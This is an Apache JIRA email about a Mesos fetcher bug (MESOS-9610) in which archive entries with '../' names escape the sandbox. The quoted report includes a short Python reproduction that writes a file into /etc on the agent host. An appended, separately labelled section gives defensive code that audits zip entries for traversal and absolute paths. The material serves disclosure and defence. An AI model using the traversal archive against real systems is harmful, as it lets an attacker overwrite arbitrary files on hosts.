[ https://issues.apache.org/jira/browse/MESOS-9610?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16787285#comment-16787285 ]
Gilbert Song commented on MESOS-9610:
-------------------------------------

Probably we could create a separate JIRA to follow up on *ARCHIVE_EXTRACT_SECURE_NOABSOLUTEPATHS*?

cc [~mderela] [~kaysoky]

> Fetcher vulnerability - escaping from sandbox
> ---------------------------------------------
>
>                 Key: MESOS-9610
>                 URL: https://issues.apache.org/jira/browse/MESOS-9610
>             Project: Mesos
>          Issue Type: Bug
>          Components: fetcher
>   Affects Versions: 1.7.2
>            Reporter: Mariusz Derela
>            Assignee: Joseph Wu
>            Priority: Blocker
>              Labels: bug, foundations, security-issue, vulnerabilities
>             Fix For: 1.8.0, 1.7.3
>
>
> I have noticed that there is a possibility to exploit the fetcher and overwrite
> any file on the agent host.
> Scenario to reproduce:
> 1) prepare a file with any content and name a file like "../../../etc/test"
> and archive it. We can use python and zipfile module to achieve that:
> {code:java}
> >>> import zipfile
> >>> zip = zipfile.ZipFile("exploit.zip", "w")
> >>> zip.writestr("../../../../../../../../../../../../etc/mariusz_was_here.txt", "some content")
> >>> zip.close()
> {code}
> 2) prepare a service that will use our artifact (exploit.zip)
> 3) run service
> At the end, in /etc we will get our file. As you can imagine, there are a lot
> of possibilities for how we can use it.
>
>

--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
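A pre-extraction audit for the kind of entry names described in the report above, as an added example that is not part of the original message and is not Mesos code. It rejects the two conditions that libarchive's ARCHIVE_EXTRACT_SECURE_NODOTDOT and ARCHIVE_EXTRACT_SECURE_NOABSOLUTEPATHS flags refuse; the function names and the sample archive are constructed for illustration.

```python
import io
import zipfile


def classify_member(name):
    """Return None if the entry name stays under the extraction root, else the reason."""
    # Zip entry names use "/"; treat "\" the same so Windows-style names are covered.
    normalized = name.replace("\\", "/")
    if normalized.startswith("/") or (len(normalized) > 1 and normalized[1] == ":"):
        return "absolute path"
    if ".." in normalized.split("/"):
        return "parent-directory component"
    return None


def audit_archive(data):
    """List (entry name, reason) for every entry that could land outside the sandbox."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for info in archive.infolist():
            reason = classify_member(info.filename)
            if reason:
                findings.append((info.filename, reason))
    return findings


def extract_checked(data, sandbox):
    """Extract into sandbox only if every entry passes the audit; otherwise write nothing."""
    findings = audit_archive(data)
    if findings:
        raise ValueError("refusing to extract: %r" % (findings,))
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        archive.extractall(sandbox)


def build_sample():
    """Constructed sample: one ordinary entry, one traversal entry, one absolute entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("app/config.json", "{}")
        archive.writestr("../../../etc/constructed_example.txt", "some content")
        archive.writestr("/tmp/constructed_absolute.txt", "some content")
    return buf.getvalue()


if __name__ == "__main__":
    for name, reason in audit_archive(build_sample()):
        print("%s: %s" % (name, reason))
```

Python's own zipfile extraction already strips leading slashes and ".." components, so the audit matters most in front of an extractor that writes entry names as stored.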